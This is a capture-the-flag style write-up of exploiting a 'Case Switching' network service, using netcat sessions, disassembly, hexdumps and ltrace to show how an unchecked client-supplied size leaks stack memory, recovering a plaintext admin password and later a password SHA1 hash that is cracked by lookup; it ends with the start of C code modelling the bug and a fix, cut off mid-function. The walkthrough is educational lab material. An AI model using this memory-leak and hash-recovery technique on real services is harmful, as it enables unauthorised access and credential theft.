We are presented with two binaries that do almost the same thing. Let's see what exactly:
# ./caseservice pass 4242
Server-side debug: login password is set to [example]
....

in another terminal:

# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
1
You selected [1]
Input: input size and then <size> bytes
10
Bla bla bla
Here you go:
bLABLABL

# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
2
You selected [2]
Configuration is done through a shell
What is the administrator password?
password
Unauthorized login attempted.
So, as the name implies, it switches the case of the input. How does it do that? We turn to the assembly of the function named handle_use, where we see this loop:
0x08048e16 <+116>: mov DWORD PTR [ebp-0xc],0x0
0x08048e1d <+123>: jmp 0x8048e41 <handle_use+159>
0x08048e1f <+125>: lea edx,[ebp-0x4c6]
0x08048e25 <+131>: mov eax,DWORD PTR [ebp-0xc]
0x08048e28 <+134>: add eax,edx
0x08048e2a <+136>: movzx eax,BYTE PTR [eax]
0x08048e2d <+139>: xor eax,0x20
0x08048e30 <+142>: lea ecx,[ebp-0x4c6]
0x08048e36 <+148>: mov edx,DWORD PTR [ebp-0xc]
0x08048e39 <+151>: add edx,ecx
0x08048e3b <+153>: mov BYTE PTR [edx],al
0x08048e3d <+155>: add DWORD PTR [ebp-0xc],0x1
0x08048e41 <+159>: mov eax,DWORD PTR [ebp-0x4cc]
0x08048e47 <+165>: cmp DWORD PTR [ebp-0xc],eax
0x08048e4a <+168>: jb 0x8048e1f <handle_use+125>
So it XORs every byte of the input with 0x20, regardless of whether the byte is a letter, a digit, a symbol, etc. A question you should ask yourself is why it needs to know the input size. Let's try to fiddle with it:
# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)
1
You selected [1]
Input: input size and then <size> bytes
10
A
Here you go:
....... (binary)
Interesting how we get lots of unknown binary data out of it. Maybe there's something useful in there. Let's redirect to a file.
# nc 127.0.0.1 4242 > out
1
255
# hexdump -Cv out
00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W|
00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca|
00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser|
00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========|
00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch|
00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1|
000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.|
000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi|
000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm|
000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo|
000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I|
000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size|
00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>|
00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you |
00000120 67 6f 3a 0a 2a 97 20 20 20 20 18 c9 df 9f e9 13 |go:.*. ......|
00000130 f9 97 ec c8 df 9f 40 20 20 20 27 20 20 20 30 8a |......@ ' 0.|
00000140 e1 97 28 e0 24 28 e0 cf df 97 20 d9 df 97 20 20 |..(.$(.... ... |
00000150 20 20 b8 2e 22 20 20 30 20 20 26 71 e9 97 20 94 | .." 0 &q.. .|
00000160 f4 97 20 20 20 20 20 30 20 20 21 20 20 20 74 8e |.. 0 ! t.|
00000170 f4 97 28 e0 24 28 20 20 20 20 20 20 20 20 31 20 |..(.$( 1 |
00000180 20 20 28 e0 24 28 20 20 20 20 20 20 20 20 74 8e | (.$( t.|
00000190 f4 97 28 e0 24 28 20 20 20 20 a8 cd df 9f 5c f3 |..(.$( ....\.|
000001a0 e0 97 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |.. |
000001b0 20 20 a8 cd df 9f 50 0a df 97 20 20 20 20 74 8e | ....P... t.|
000001c0 f4 97 20 20 20 20 20 20 20 20 a8 cd df 9f bb ad |.. ......|
000001d0 24 28 28 e0 24 28 27 20 20 20 74 c9 df 9f 27 20 |$((.$(' t...' |
000001e0 20 20 20 20 20 20 e3 69 bc 07 09 53 2a 5f a0 5e | .i...S*_.^|
000001f0 db a6 56 89 0d eb 4f aa 1f af 45 58 41 4d 50 4c |..V...O...EXAMPL|
00000200 45 20 20 08 08 08 08 08 08 08 08 08 08 08 08 08 |E .............|
00000210 08 08 08 08 08 08 a1 a1 a1 a1 a1 a1 a1 a1 a1 a1 |................|
00000220 a1 a1 a1 |...|
00000223
There's our password with the switched case! Let's try on the remote system.
# hexdump -Cv out
00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W|
00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca|
00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser|
00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========|
00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch|
00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1|
000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.|
000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi|
000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm|
000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo|
000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I|
000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size|
00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>|
00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you |
00000120 67 6f 3a 0a 2a 97 20 20 20 20 18 c9 df 9f e9 13 |go:.*. ......|
00000130 f9 97 ec c8 df 9f 40 20 20 20 2c 20 20 20 30 8a |......@ , 0.|
00000140 e1 97 28 e0 24 28 e0 cf df 97 20 d9 df 97 20 20 |..(.$(.... ... |
00000150 20 20 b8 2e 22 20 20 30 20 20 26 71 e9 97 20 94 | .." 0 &q.. .|
00000160 f4 97 20 20 20 20 20 30 20 20 21 20 20 20 74 8e |.. 0 ! t.|
00000170 f4 97 28 e0 24 28 20 20 20 20 20 20 20 20 31 20 |..(.$( 1 |
00000180 20 20 28 e0 24 28 20 20 20 20 20 20 20 20 74 8e | (.$( t.|
00000190 f4 97 28 e0 24 28 20 20 20 20 a8 cd df 9f 5c f3 |..(.$( ....\.|
000001a0 e0 97 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |.. |
000001b0 20 20 a8 cd df 9f 50 0a df 97 20 20 20 20 74 8e | ....P... t.|
000001c0 f4 97 20 20 20 20 20 20 20 20 a8 cd df 9f bb ad |.. ......|
000001d0 24 28 28 e0 24 28 2c 20 20 20 74 c9 df 9f 27 20 |$((.$(, t...' |
000001e0 20 20 20 20 20 20 68 0e 5b fd 7b 7d 73 03 bc ac | h.[.{}s...|
000001f0 0a 3f 60 6f 4e 46 f9 c7 85 57 49 4e 54 45 4c 4c |.?`oNF...WINTELL|
00000200 49 47 45 4e 43 45 20 20 08 08 08 08 08 08 08 08 |IGENCE ........|
00000210 08 08 08 08 08 08 a1 a1 a1 a1 a1 a1 a1 a1 a1 a1 |................|
00000220 a1 a1 a1 |...|
00000223
So the password seems to be "wintelligence", but note that "EXAMPLE" in the first listing started at offset 0x1fa. At 0x1fa in the second listing is the "I" of "INTELLIGENCE". Trying "intelligence" works and we are able to log in.
This task is supposedly more secure. Let's see just how secure by doing almost the same thing as before through hexdump.
# nc 127.0.0.1 4242 > out
1
255
# hexdump -Cv out
00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W|
00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca|
00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser|
00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========|
00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch|
00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1|
000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.|
000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi|
000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm|
000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo|
000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I|
000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size|
00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>|
00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you |
00000120 67 6f 3a 0a 2a df af 1f aa 4f a0 df 9a 97 74 8e |go:.*....O....t.|
00000130 f4 97 20 e0 24 28 20 30 22 20 48 e1 24 28 0d cc |.. .$( 0" H.$(..|
00000140 e1 97 68 98 f4 97 20 20 20 20 68 c9 df 9f e9 13 |..h... h.....|
00000150 f9 97 fc c8 df 9f 40 20 20 20 27 20 20 20 30 8a |......@ ' 0.|
00000160 e1 97 20 20 20 20 e0 cf df 97 20 d9 df 97 20 20 |.. .... ... |
00000170 20 20 b8 2e 22 20 20 30 20 20 26 71 e9 97 31 20 | .." 0 &q..1 |
00000180 20 20 20 90 dd 97 20 30 20 20 21 20 20 20 74 8e | ... 0 ! t.|
00000190 f4 97 28 e0 24 28 20 20 20 20 20 20 20 20 ae 9a |..(.$( ..|
000001a0 e1 97 28 e0 24 28 20 20 20 20 20 20 20 20 74 8e |..(.$( t.|
000001b0 f4 97 28 e0 24 28 20 20 20 20 58 cd df 9f 5c f3 |..(.$( X...\.|
000001c0 e0 97 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |.. |
000001d0 20 20 58 cd df 9f 50 0a df 97 20 20 20 20 74 8e | X...P... t.|
000001e0 f4 97 20 20 20 20 20 20 20 20 58 cd df 9f 1d ad |.. X.....|
000001f0 24 28 28 e0 24 28 27 20 20 20 50 c9 df 9f 68 20 |$((.$(' P...h |
00000200 20 20 20 20 20 20 20 20 20 20 20 20 20 20 03 02 | ..|
00000210 01 0a |..|
00000212
So even if we ask for 255 bytes it provides considerably less. Why is that? In task 1, handle_use ended like this:
0x08048e47 <+165>: cmp DWORD PTR [ebp-0xc],eax
0x08048e4a <+168>: jb 0x8048e1f <handle_use+125>
0x08048e4c <+170>: mov eax,DWORD PTR [ebp-0x4cc]
0x08048e52 <+176>: mov DWORD PTR [esp+0x8],eax
0x08048e56 <+180>: lea eax,[ebp-0x4c6]
0x08048e5c <+186>: mov DWORD PTR [esp+0x4],eax
0x08048e60 <+190>: mov eax,DWORD PTR [ebp+0x8]
0x08048e63 <+193>: mov DWORD PTR [esp],eax
0x08048e66 <+196>: call 0x8048ab0 <write@plt>
0x08048e6b <+201>: leave
0x08048e6c <+202>: ret
Task 3 ends it like this:
0x08048de6 <+162>: cmp DWORD PTR [ebp-0xc],eax
0x08048de9 <+165>: jb 0x8048dbe <handle_use+122>
0x08048deb <+167>: lea eax,[ebp-0x4c6]
0x08048df1 <+173>: mov DWORD PTR [esp],eax
0x08048df4 <+176>: call 0x80489f0 <puts@plt>
0x08048df9 <+181>: leave
0x08048dfa <+182>: ret
So instead of a write it does a puts, which stops at the first NULL byte. We can bypass this by giving as input exactly the number of bytes needed to reach that NULL byte.
Let's try 210 bytes.
# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out
00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W|
00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca|
00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser|
00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========|
00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch|
00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1|
000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.|
000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi|
000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm|
000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo|
000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I|
000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size|
00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>|
00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you |
00000120 67 6f 3a 0a 41 41 41 41 41 41 41 41 41 41 41 41 |go:.AAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001f0 41 41 41 41 41 41 2a 20 20 20 50 c9 df 9f 68 20 |AAAAAA* P...h |
00000200 20 20 20 20 20 20 20 20 20 20 20 20 20 20 03 02 | ..|
00000210 01 0a |..|
00000212
We seem to need 2 + 8 + 8 + 8 + 2 = 28 more bytes to get past the NULL, so we try 238 bytes:
# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out
00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W|
00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca|
00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser|
00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========|
00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch|
00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1|
000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.|
000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi|
000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm|
000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo|
000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I|
000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size|
00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>|
00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you |
00000120 67 6f 3a 0a 41 41 41 41 41 41 41 41 41 41 41 41 |go:.AAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000210 41 41 2a 69 bc 07 09 53 2a 5f a0 5e db a6 56 89 |AA*i...S*_.^..V.|
00000220 0d eb 4f 8a 3f 8f 03 02 01 0a |..O.?.....|
0000022a
To get past the next NULL byte we would need 238 + 6 + 8 + 8 + 2 = 262 bytes, which is more than we can send. Before digging into the assembly, let's do some dynamic analysis.
# ltrace ./caseservice_reload pass 4242
__libc_start_main(0x8048fab, 3, 0xbfffee84, 0x80491d0 <unfinished ...>
fopen("pass", "r") = 0x804c008
fgets("example\n", 1000, 0x804c008) = 0xbfffe988
strlen("example\n") = 8
printf("Server-side debug: login passwor"..., "example"Server-side debug: login password is set to [example]
) = 54
SHA1(0xbfffe988, 7, 0xbfffe970, 72) = 0xbfffe970
fclose(0x804c008) = 0
atoi(0xbffff079, 0, 0x2cb4304e, 1) = 4242
socket(2, 1, 0) = 3
bzero(0xbfffedb8, 16) = <void>
inet_addr("000.0.0.0") = 0
htons(4242, 16, 0, 1) = 0x9210
setsockopt(3, 1, 2, 0xbfffedcc) = 0
bind(3, 0xbfffedb8, 16, 0xbfffedcc) = 0
listen(3, 5, 16, 0xbfffedcc) = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc) = 4
fork() = 18145
close(4) = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc <no return ...>
--- SIGCHLD (Child exited) ---
Notice the SHA1 call. If we look into handle_configure we see that the comparison (memcmp) is also done against the hash of our input. Since the SHA1 of the correct password is computed at every program start, maybe it's still on the stack. Let's check the hash of "example":
# echo -n "example" | sha1sum
c3499c2729730a7f807efb8676a92dcb6f8a3f8f -
Looking for the beginning of the hash, it doesn't seem to be in our hexdump. But the end is there:
00000220 0d eb 4f 8a 3f 8f 03 02 01 0a |..O.?.....|
Why would there be only 3 bytes? Remember the XOR function? 0x6f XOR 0x20 = 0x4f, which is exactly the byte preceding these 3 bytes. Extrapolating, we see the whole hash with its first 17 bytes XORed with 0x20, and thus easily recoverable.
Let's try remote:
# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out
00000000 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000010 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000020 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 57 |==============.W|
00000030 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 43 61 |elcome to the Ca|
00000040 73 65 20 53 77 69 74 63 68 69 6e 67 20 73 65 72 |se Switching ser|
00000050 76 69 63 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |vice.===========|
00000060 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000070 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d |================|
00000080 3d 3d 3d 0a 4d 61 6b 65 20 79 6f 75 72 20 63 68 |===.Make your ch|
00000090 6f 69 63 65 20 28 31 20 6f 72 20 32 29 3a 0a 31 |oice (1 or 2):.1|
000000a0 2e 20 55 73 65 20 73 65 72 76 69 63 65 0a 32 2e |. Use service.2.|
000000b0 20 43 6f 6e 66 69 67 75 72 65 20 73 65 72 76 69 | Configure servi|
000000c0 63 65 20 28 6f 6e 6c 79 20 66 6f 72 20 61 64 6d |ce (only for adm|
000000d0 69 6e 69 73 74 72 61 74 6f 72 73 29 0a 0a 59 6f |inistrators)..Yo|
000000e0 75 20 73 65 6c 65 63 74 65 64 20 5b 31 5d 0a 49 |u selected [1].I|
000000f0 6e 70 75 74 3a 20 69 6e 70 75 74 20 73 69 7a 65 |nput: input size|
00000100 20 61 6e 64 20 74 68 65 6e 20 3c 73 69 7a 65 3e | and then <size>|
00000110 20 62 79 74 65 73 0a 48 65 72 65 20 79 6f 75 20 | bytes.Here you |
00000120 67 6f 3a 0a 41 41 41 41 41 41 41 41 41 41 41 41 |go:.AAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000001f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000210 41 41 b6 81 c9 e2 a4 97 34 db b7 e5 d8 88 a8 97 |AA......4.......|
00000220 03 91 b9 33 a9 7e 03 02 01 0a |...3.~....|
0000022a
The interesting part is "b6 81 c9 e2 a4 97 34 db b7 e5 d8 88 a8 97 03 91 b9 33 a9 7e". XORing the first 17 bytes with 0x20, as discussed, yields the hash 96a1e9c284b714fb97c5f8a888b723b19933a97e. Searching for this hash on Google yields the password "horizonward", which works.
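Every task above fails the same way: handle_use trusts the client-supplied size instead of the number of bytes actually received, and its stack buffer still holds leftovers from earlier frames (the SHA1 of the password computed in main). The following is an added illustration, not code from the challenge binaries: a model of that handler beside a hardened version that only processes received bytes and scrubs the buffer. The buffer size, the 255-byte cap and the "stale secret" are assumptions and constructed sample data.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_CAP 1222   /* assumed size of the buffer at ebp-0x4c6 */
#define MAX_REQ 255    /* assumed cap on the client-supplied size */

/* The loop from the disassembly: every byte XORed with 0x20. */
static void case_switch(uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= 0x20;
}

/* Vulnerable model: processes and replies with `claimed` bytes although only
 * `received` arrived, so whatever an earlier frame left in the stack buffer
 * goes out XORed with 0x20. Returns the number of bytes placed in `out`. */
size_t handle_use_vulnerable(uint8_t *stack, const uint8_t *in, size_t received,
                             size_t claimed, uint8_t *out)
{
    if (claimed > MAX_REQ) claimed = MAX_REQ;      /* the only check present */
    memcpy(stack, in, received < claimed ? received : claimed);
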